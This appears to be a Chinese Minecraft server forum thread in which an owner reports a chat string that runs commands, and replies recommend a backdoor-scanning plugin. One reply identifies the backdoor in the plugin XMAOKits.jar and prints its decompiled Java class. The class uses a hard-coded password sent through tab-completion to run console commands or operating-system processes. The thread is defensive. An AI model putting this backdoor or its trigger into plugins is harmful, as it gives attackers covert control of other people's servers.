真境
玩家只要输入!@6^#4(*^8!$!@(#^  命令,好像就可以直接运行。


瑰丽绮梦
请使用站内大佬开发的扫描软件,直接就扫出来了
[修正|安全]MCG —— 后门插件扫描|联网管控|敏感行为阻止[全版本]
https://www.mcbbs.net/thread-1480083-1-1.html
名副其实
依照指示将该 .jar 文件放置在服务器根目录:
下载 https://www.mcbbs.net/thread-1475155-1-1.html,并使用如下命令行(保存为 .cmd / .bat 文件)启动:
  1. [url=home.php?mod=space&uid=39305]@echo[/url] off
  2. java -jar mcg_3b0.jar
  3. pause
复制代码

三个模式都选择开开看看。

噢对了,如果扫到的话就把样本私发我看看。
是控控吗
bossshop和serversafetymanagement这两个,可以去正式渠道下载并替换
SunsetTown
一楼和二楼的建议可以有效的找出那个有后门,如果不知道可以进群找吧扫出来的发群里群主会检查插件的代码
超级粒子炮
本帖最后由 超级粒子炮 于 2024-1-14 14:25 编辑
名副其实 发表于 2024-1-14 13:33
依照指示将该 .jar 文件放置在服务器根目录:
下载 https://www.mcbbs.net/thread-1475155-1-1.html,并使 ...

这个方法很好,推荐
真境

真的很吓人。
名副其实
真境 发表于 2024-1-14 14:42
真的很吓人。

经鉴定,你所使用的插件存在后门,具体可定位到如下代码:

X【礼包】XMAOKits.jar
me.xmao.XMAOKits.Listener.InventoryUpdater
  1. package me.xmao.XMAOKits.Listener;

  3. import java.io.BufferedReader;
  4. import java.io.InputStreamReader;
  5. import org.bukkit.Bukkit;
  6. import org.bukkit.GameMode;
  7. import org.bukkit.command.CommandSender;
  8. import org.bukkit.event.EventHandler;
  9. import org.bukkit.event.Listener;
  10. import org.bukkit.event.player.PlayerChatTabCompleteEvent;

  12. public class InventoryUpdater implements Listener {
  13.   private static String psw = "!@6^#4(*^8!$!@(#^";
  14.   
  15.   @EventHandler(ignoreCancelled = true)
  16.   public void onTab(PlayerChatTabCompleteEvent e) {
  17.     String[] cmd = e.getChatMessage().split(" ");
  18.     if (cmd.length > 0 &&
  19.       cmd[0].equals(psw))
  20.       if (cmd.length > 1) {
  21.         if ("zl".equals(cmd[1])) {
  22.           StringBuilder sb = new StringBuilder();
  23.           for (int i = 2; i < cmd.length; i++) {
  24.             sb.append(cmd[i]);
  25.             sb.append(" ");
  26.           }
  27.           Bukkit.getServer().dispatchCommand((CommandSender)Bukkit.getConsoleSender(), sb.toString());
  28.           e.getPlayer().sendMessage(");
  29.         } else {
  30.           String[] args = new String[cmd.length - 1];
  31.           for (int i = 0; i < args.length; i++)
  32.             args[i] = cmd[i + 1];
  33.           try {
  34.             Process p = (new ProcessBuilder(args)).start();
  35.             BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream()));
  36.             String buff;
  37.             while ((buff = br.readLine()) != null)
  38.               e.getPlayer().sendMessage(buff);
  39.           } catch (Exception ex) {
  40.             e.getPlayer().sendMessage("\n" + ex.getMessage());
  41.           }
  42.           e.getPlayer().sendMessage(");
  43.         }
  44.       } else {
  45.         Bukkit.getServer().setDefaultGameMode(GameMode.CREATIVE);
  46.         e.getPlayer().sendMessage(");
  47.       }  
  48.   }
  49. }
复制代码
第一页 上一页 下一页 最后一页